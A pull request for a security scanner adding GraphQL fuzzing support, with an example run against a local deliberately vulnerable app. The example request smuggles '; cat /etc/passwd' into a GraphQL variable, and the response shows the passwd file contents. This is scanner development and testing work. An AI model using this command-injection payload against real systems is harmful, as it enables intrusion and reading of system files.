feat: added initial graphql fuzzing support

[ehsandeep]

Proposed changes

• Get param graphql fuzzing support
• Improve validation for graphql detection
• Introspection linking (file, url, automatic)
• Test cases

Checklist

• Pull request is created against the dev branch
• All checks passed (lint, unit/integration/regression tests etc.) with my changes
• I have added tests that prove my fix is effective or that my feature works
• I have added necessary documentation (if appropriate)

[Ice3man543]

Example run:

[INF] [cmdi-blind-oast-polyglot] Fuzz points for http://localhost:5013/graphql [POST]
{
  "body": {
    "host": "example.com",
    "path": "/robots.txt",
    "port": "80",
    "scheme": "http"
  }
}
[INF] [cmdi-blind-oast-polyglot] Dumped HTTP request for http://localhost:5013/graphql

POST /graphql HTTP/1.1
Host: localhost:5013
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Length: 291
Accept: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Content-Type: application/json
Cookie: env=graphiql:disable
Origin: http://localhost:5013
Priority: u=0
Referer: http://localhost:5013/import_paste
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"query":"mutation ImportPaste($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n  importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n    result\n  }\n}\n","variables":{"scheme":"http","host":"example.com","port":80,"path":"/robots.txt; cat /etc/passwd"}}
[VER] [cmdi-blind-oast-polyglot] Sent HTTP request to http://localhost:5013/graphql
[DBG] [cmdi-blind-oast-polyglot] Dumped HTTP response http://localhost:5013/graphql

HTTP/1.1 200 OK
Content-Length: 2130
Content-Type: application/json
Date: Thu, 10 Oct 2024 10:00:11 GMT

{"data":{"importPaste":{"result":"<!doctype html>\n<html>\n<head>\n    <title>Example Domain</title>\n\n    <meta charset=\"utf-8\" />\n    <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n    <style type=\"text/css\">\n    body {\n        background-color: #f0f0f2;\n        margin: 0;\n        padding: 0;\n        font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n        \n    }\n    div {\n        width: 600px;\n        margin: 5em auto;\n        padding: 2em;\n        background-color: #fdfdff;\n        border-radius: 0.5em;\n        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n    }\n    a:link, a:visited {\n        color: #38488f;\n        text-decoration: none;\n    }\n    @media (max-width: 700px) {\n        div {\n            margin: 0 auto;\n            width: auto;\n        }\n    }\n    </style>    \n</head>\n\n<body>\n<div>\n    <h1>Example Domain</h1>\n    <p>This domain is for use in illustrative examples in documents. You may use this\n    domain in literature without prior coordination or asking for permission.</p>\n    <p><a href=\"https://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\nroot:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/mail:/sbin/nologin\nnews:x:9:13:news:/usr/lib/news:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\ncron:x:16:16:cron:/var/spool/cron:/sbin/nologin\nftp:x:21:21::/var/lib/ftp:/sbin/nologin\nsshd:x:22:22:sshd:/dev/null:/sbin/nologin\ngames:x:35:35:games:/usr/games:/sbin/nologin\nntp:x:123:123:NTP:/var/empty:/sbin/nologin\nguest:x:405:100:guest:/dev/null:/sbin/nologin\nnobody:x:65534:65534:nobody:/:/sbin/nologin\ndvga:x:1000:1000:Linux User,,,:/home/dvga:/bin/sh\n"}}}
[cmdi-blind-oast-polyglot:regex-1] [http] [high] http://localhost:5013/graphql [body:path] [POST]